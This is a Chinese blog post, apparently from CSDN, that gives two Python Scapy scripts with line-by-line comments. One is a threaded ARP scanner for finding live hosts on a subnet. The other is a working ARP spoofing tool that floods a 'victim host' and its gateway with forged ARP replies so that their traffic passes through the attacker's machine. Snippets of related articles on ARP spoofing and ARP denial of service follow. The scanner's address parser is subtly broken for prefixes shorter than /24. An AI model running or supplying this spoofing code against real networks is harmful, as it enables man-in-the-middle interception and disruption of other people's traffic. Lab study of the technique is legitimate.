Python Scapy库实现ARP扫描和ARP欺骗

最新推荐文章于 2024-04-30 00:51:20 发布
最新推荐文章于 2024-04-30 00:51:20 发布
阅读量818 收藏 9
点赞数 7
文章标签: python 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YHKKun/article/details/136077274
版权

 ARP扫描:检测指定IP网段中哪些主机是在线的,并获取它们的MAC地址

from scapy.all import *  
import argparse  
import threading  
import time  
import logging  
  
# 解析CIDR格式的网段,并返回IP地址列表  
# >接受一个CIDR格式的网段作为输入(例如192.168.1.0/24)。
# >将网段解析为IP地址列表。
# >通过子网掩码长度计算IP地址范围,并生成该网段内所有可能的IP地址。
def Parse_IP(targets):  
    """  
    将CIDR格式的网段字符串转换为IP地址列表。  
  
    :param targets: CIDR格式的网段字符串,例如"192.168.1.1/24"  
    :return: IP地址列表  
    """  
    _split = targets.split('/')  # 按斜杠分割字符串,得到网络地址和子网掩码长度  
    first_ip = _split[0]  # 获取网络地址  
    ip_split = first_ip.split('.')  # 按点分割网络地址,得到各部分的数字  
      
    # 生成IP地址范围  
    ipv4 = range(int(ip_split[3]), int(ip_split[3]) + (2 ** (32 - int(_split[1]))))  
      
    # 构建IP地址列表  
    addr = [f"{ip_split[0]}.{ip_split[1]}.{ip_split[2]}.{p}" for p in ipv4]  
    return addr  
  
# 使用ARP协议扫描指定IP地址,查找在线设备  
# >接受一个IP地址作为输入。
# >使用Scapy发送一个ARP请求到这个IP地址,并等待回复
# >如果收到ARP回复,则提取并打印出该IP地址对应的MAC地址
def ARP_Scan(address):  
    """  
    发送ARP请求到指定IP地址,并查找在线设备的MAC地址。  
  
    :param address: 要扫描的IP地址  
    """  
    try:  
        # 发送ARP请求并等待回复,超时时间为5秒  
        ret = sr1(ARP(pdst=address), timeout=5, verbose=False)  
          
        # 如果收到回复  
        if ret:  
            # 检查回复是否包含ARP层,并且操作码是否为2(表示ARP回复)  
            if ret.haslayer('ARP') and ret.fields['op'] == 2:  
                # 打印IP地址和对应的MAC地址  
                print('[+] IP地址: %-13s ==> MAC地址: %-15s' %(ret.fields['psrc'], ret.fields['hwsrc']))  
    except Exception as e:  
        logging.error(f"An error occurred while scanning IP {address}: {e}")  
        exit(1)  
  
# 程序入口 
# >argparse模块解析命令行参数
# >如果提供了扫描网段参数,则调用Parse_IP函数解析网段,获取IP地址列表
# >每个IP地址创建一个新的线程来执行ARP_Scan函数
if __name__ == "__main__":  
    # 设置Scapy的日志记录级别为ERROR,以减少不必要的输出  
    logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  
      
    # 创建命令行参数解析器  
    parser = argparse.ArgumentParser()  
    parser.add_argument("-s", "--scan", dest="scan", help="输入一个扫描网段")  
      
    # 解析命令行参数  
    args = parser.parse_args()  
      
    # 如果提供了扫描网段参数  
    if args.scan:  
        # 解析网段并获取IP地址列表  
        addr_list = Parse_IP(args.scan)  
          
        # 创建线程列表  
        threads = []  
          
        # 对每个IP地址启动一个新的扫描线程  
        for item in addr_list:  
            t = threading.Thread(target=ARP_Scan, args=(item,))  
            threads.append(t)  
            t.start()  
          
        # 等待所有线程完成  
        for item in threads:  
            item.join()  
    else:   
        parser.print_help()

ARP欺骗:通过伪造ARP响应来欺骗目标计算机和网关,使它们相信它们正在与对方通信,而实际上所有的通信都经过了攻击者的机器

from scapy.all import *  
import argparse  
import threading, time  
import logging  
  
# 定义SendPayload函数,用于发送ARP欺骗的数据包  
def SendPayload(Interface, srcMac, tgtMac, gateWayMac, gatewayIP, tgtIP):  
    # 打印目标MAC地址和目标IP地址,以及发送的数据包数量  
    print("[+] 目标MAC: {} 目标IP: {} 发送: 2 packets".format(tgtMac, tgtIP))  
      
    # 生成并发送第一个ARP数据包,伪造网关的IP和MAC地址,欺骗目标计算机  
    # 使目标计算机认为网关的MAC地址是攻击者的MAC地址  
    sendp(  
        Ether(src=srcMac, dst=tgtMac) /  # 以攻击者的MAC地址作为源MAC,目标计算机的MAC地址作为目的MAC  
        ARP(hwsrc=srcMac, psrc=gatewayIP, hwdst=tgtMac, pdst=tgtIP, op=2),  # ARP数据包,其中op=2表示ARP回复  
        iface=Interface
    )  
      
    # 生成并发送第二个ARP数据包,伪造目标计算机的IP和MAC地址,欺骗网关  
    # 使网关认为目标计算机的MAC地址是攻击者的MAC地址  
    sendp(  
        Ether(src=srcMac, dst=gateWayMac) /  # 以攻击者的MAC地址作为源MAC,网关的MAC地址作为目的MAC  
        ARP(hwsrc=srcMac, psrc=tgtIP, hwdst=gateWayMac, pdst=gatewayIP, op=2), 
        iface=Interface
    )  
  
if __name__ == "__main__":  
    # 创建命令行参数解析器  
    parser = argparse.ArgumentParser()  
    # 接口名 
    parser.add_argument("-i", "--interface", dest="interface", help="输入接口名")  
    # 网关地址
    parser.add_argument("-g", "--gateway", dest="gateway", help="输入网关地址")  
    # 目标主机地址  
    parser.add_argument("-t", "--target", dest="target", help="输入被害主机地址")  
    # 解析命令行参数  
    args = parser.parse_args()  
      
    if args.gateway and args.target:  
        # 通过接口名称获取本机的MAC地址  
        srcMac = get_if_hwaddr(args.interface)  
          
        # 通过目标主机的IP地址获取其MAC地址  
        tgtMac = getmacbyip(args.target)  
          
        # 通过网关的IP地址获取其MAC地址  
        gatewayMac = getmacbyip(args.gateway)  
          
        # 持续发送ARP欺骗数据包  
        while True:  
            # 创建一个新线程来发送ARP欺骗数据包  
            t = threading.Thread(target=SendPayload, args=(args.interface, srcMac, tgtMac, gatewayMac, args.gateway, args.target))  
            t.start()  
            t.join()   
            time.sleep(1)  
    else:  
        parser.print_help()

YH美洲大蠊
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pythonarp欺骗
willow_liang的博客
11-03 535
kali使用Ettercap进行arp欺骗 192.168.0.105加入target1,192.168.0.1网关加入target2 点击MITM中的ARP windows7查看mac地址已经发生变化 可以用driftnet查看被攻击的win7访问网页的图片,最新版的kali未安装该软件,实际测试该软件应该只能查看一些加密不严格的网站 或者使用wireshark抓包嗅探 win7登录dvwa过程,可在kali抓包嗅探到 python编写arp欺骗脚本 srp发送数据包 verbose不显
Python实现ARP欺骗
xiaoxiao的博客
04-02 6662
实验目的:局域网段扫描,利用arp欺骗抓包获取密码 :局域网上的一台主机,如果接收到一个ARP报文,即使该报文不是该主机所发送的ARP请求的应答报文,该主机也会将ARP报文中的发送者的MAC地址和IP地址更新或加入到ARP表中。ARP欺骗攻击就利用了这点,攻击者主动发送ARP报文。通过不断发送这些伪造的ARP报文,让局域网上所有的主机和网关ARP表,其对应的MAC地址均为攻击者的MAC地址,这样所...
使用 Scapy 编写 ARP 拒绝服务攻击脚本
Flag少侠的博客
04-09 1242
ARP拒绝服务攻击利用ARP协议的工作原理,通过发送大量的伪造ARP请求来混乱目标设备的ARP缓存,使其无法正确地将IP地址解析为MAC地址。攻击者发送大量的ARP请求,每个请求都会伪造一个源IP地址和源MAC地址。目标设备收到这些伪造的请求后,会将伪造的源IP地址和MAC地址存储在ARP缓存中,覆盖掉真实的映射关系。这样,当其他设备需要与目标设备通信时,由于ARP缓存中的映射关系是错误的,通信将无法正常进行,从而导致拒绝服务
scapy进行arp攻击
python_xhw的博客
09-03 569
该代码使用ARP欺骗攻击将攻击者的MAC地址发送给目标主机,并伪造源IP地址。由于ARP缓存记录会优先使用最近的条目,当目标主机收到欺骗的ARP响应时,它会更新自己的ARP缓存记录。这导致目标主机将流量发送到攻击者的MAC地址,从而实现ARP攻击。Scapy是一个Python编写的交互式数据包操作程序和。它可以用于创建、发送和捕获网络数据包,并实现各种网络协议。
超详细NMAP安装保姆级教程,Nmap的介绍、功能并进行网络扫描,2024年收藏这一篇就够了_使用nmap扫描工具新建一个扫描profile,选择添加多项扫描脚本,
最新发布
2401_84297035的博客
04-30 564
选择并更改安装路径,点击安装软件主界面可以看出其内置了很多扫描类型,支持查看多种扫描结果,UI界面比较直观此外,还可以在linux终端内安装,更加灵活。查看linux下nmap的帮助信息。(执行命令nmpa -h)可见nmap指令的一般格式是:nmap扫描类型(可叠加)扫描类型(可叠加)选项选项目标目标其中目标可以有如下格式:当网络不通时,我们需要ping一下主机,检查网关是否正常,这与主机发现原理一样。
arp欺骗python脚本
04-24
使用python进行arp欺骗,脚本效率一般,初学者可以好好理解。
pythonarp欺骗_Python3 小工具-ARP欺骗
weixin_39900582的博客
12-16 105
在kali中使用from scapy.all import *import optparseimport osdef send(pkt,interface):for p in pkt:sendp(p,iface=interface)def req(targets,source):for target in targets:tr_mac=getmacbyip(target)pkt=Ether(dst...
python实现ARP欺骗
weixin_30457065的博客
08-27 584
首先介绍一个python第三方--Scapy,这个不是标准,默认是没有的,需要安装,不过在kali-linux里边是默认安装的, 这里我用kali做攻击者,xp做受害者 关于Scapy Scapy是一个功能强大的交互式数据包操作程序。它能够伪造或解码大量协议的数据包,通过线路发送它们,捕获它们,匹配请求和回复等等。它可以轻松处理大多数经典任务,如扫描,跟踪路由,探测,单元测试,攻击或网...
Python利用scapy实现ARP欺骗的方法
01-20
本次用代码实现的是ARP网关欺骗,通过发送错误的网关映射关系导致局域网内其他主机无法正常路由。使用scapyscapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送: eth = Ether...
python使用scapy模块实现ARP扫描的过程.docx
01-21
python使用scapy模块实现ARP扫描的过程.docx
Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
12-23
scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 这里就直接用pythonscapy搞。 这里是arp的攻击方式,你可以做成arp攻击。 复制...
python发送伪造的arp请求
12-25
复制代码 代码如下:#!/usr/bin/env pythonimport socket s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)s.bind((“lo”, 0)) src_addr = “\x50\x3d\xe5\x0e\x35\x3f”dst_addr = “\xff\xff\xff\xff\xff\xff”ethertype = “\x08\x06” s.send(dst_addr+src_addr+ethertype+”\x00\x01″+”\x08\x00″+”\x06″+”\x04″+”\x00\x01″+src_ad
python使用arp欺骗伪造网关的方法
01-20
本文实例讲述了python使用arp欺骗伪造网关的方法。分享给大家供大家参考。具体实现方法如下: #coding:utf-8 ''' arp欺骗局域网pc,将伪造的网关mac以网关的arp应答发送给pc ''' from scapy.all import ARP,send,...
Scapy__ARP_Scanner
07-27
Scapy ARP Scanner 是一个使用 Python Scapy 实现ARP.Scanner脚本,用于扫描局域网中的主机。下面是 Scapy ARP Scanner 的知识点总结: 一、Scapy 介绍 Scapy 是一个功能强大的网络探测和安全测试...
使用python实现arp欺骗
xiaoantongxueqaq的博客
04-30 2982
实验拓扑: 1.首先进行ping测试网关和kali,来获取mac地址 ping 192.168.72.131 ping 192.168.72.20 MAC地址对应结果如下: 2.进行使用脚本中间人欺骗,脚本放在最后 3.查看欺骗后的arp表,R1和PC1都认为对方的mac地址是7B-26,也就是kali的mac python脚本: import sys import time from scapy.all import sendp, AR...
python arp攻击_用python实现ARP欺骗
weixin_39517202的博客
11-30 338
首先介绍一个python第三方--Scapy,这个不是标准,默认是没有的,需要安装,不过在kali-linux里边是默认安装的,这里我用kali做攻击者,xp做受害者关于ScapyScapy是一个功能强大的交互式数据包操作程序。它能够伪造或解码大量协议的数据包,通过线路发送它们,捕获它们,匹配请求和回复等等。它可以轻松处理大多数经典任务,如扫描,跟踪路由,探测,单元测试,攻击或网络发现(它可...
利用 Python 开发包 Scapy 实现 ARP 欺骗_python实现ip欺骗检测(1)
2401_84254011的博客
04-11 723
sendp(p1)
python实现arp欺骗,详细步骤及思路
weixin_45945976的博客
03-15 1763
python实现arp欺骗,详细步骤及思路 用python实现arp欺骗,详细步骤及思路: # 1. 从命令行获取要欺骗的IP # 2. 获取IP对应的MAC地址 # 3. 定义MAC获取函数get_mac() # 4. 启动ARP欺骗 # 5. 定义ARP欺骗函数 # 6. 嗅探数据包 # 7. 定义cookie嗅探函数 # 8. 恢复靶机ARP缓存 # 9. 定义ARP缓存恢复函数 from scapy.all import * import time from threading import T
python实现局域网攻击_python实现ARP欺骗(宿舍停网警告)
weixin_39989222的博客
11-23 541
arp全称为“地址解析协议”,是根据IP获取对应mac地址的一种协议。主机上也是根据arp缓存表进行内网主机的信息交互的,arp缓存表存放着ip对应mac地址的关系。如果一台主机需要上网,就需要先找到自己的网关ip。由于在以太网中都是用mac地址进行主机的交互的,所以要在arp缓存表中根据ip地址查询对应的mac地址。。找到mac地址后就可以将自己的请求发给网关。网关再代之进行转发。这就是一个主机...
python arp扫描_Python3利用scapy局域网实现自动多线程arp扫描功能
05-28
好的,你的问题是关于Python3利用Scapy局域网实现自动多线程ARP扫描功能。 首先,你需要安装Scapy,可以使用以下命令: ``` pip install scapy ``` 然后,你可以使用以下Python代码实现ARP扫描功能: ```python from scapy.all import * from threading import Thread def arp_scan(ip): arp = ARP(pdst=ip) ether = Ether(dst="ff:ff:ff:ff:ff:ff") packet = ether/arp result = srp(packet, timeout=3, verbose=0)[0] if result: return {'IP': result[0][1].psrc, 'MAC': result[0][1].hwsrc} else: return {'IP': ip, 'MAC': 'N/A'} def scan_network(target_ip, threads): ips = [target_ip + str(i) for i in range(1, 255)] print("Scanning in progress...") scan_results = [] for ip in ips: t = Thread(target=lambda result_list: result_list.append(arp_scan(ip)), args=(scan_results,)) t.start() if threading.activeCount() > threads: t.join() print("Scan complete.") return scan_results if __name__ == '__main__': target_ip = '192.168.1.' threads = 50 results = scan_network(target_ip, threads) for result in results: print(result['IP'], result['MAC']) ``` 在这个示例中,我们定义了两个函数,arp_scan()和scan_network()。arp_scan()函数用于扫描单个IP地址,并返回IP地址和MAC地址。scan_network()函数用于扫描整个网络,并返回所有扫描结果。 我们还使用了Python的多线程功能来加快扫描速度,并限制了线程数以避免过度消耗系统资源。 最后,我们使用主函数来设置目标IP地址和线程数,然后调用scan_network()函数来执行扫描,并打印扫描结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值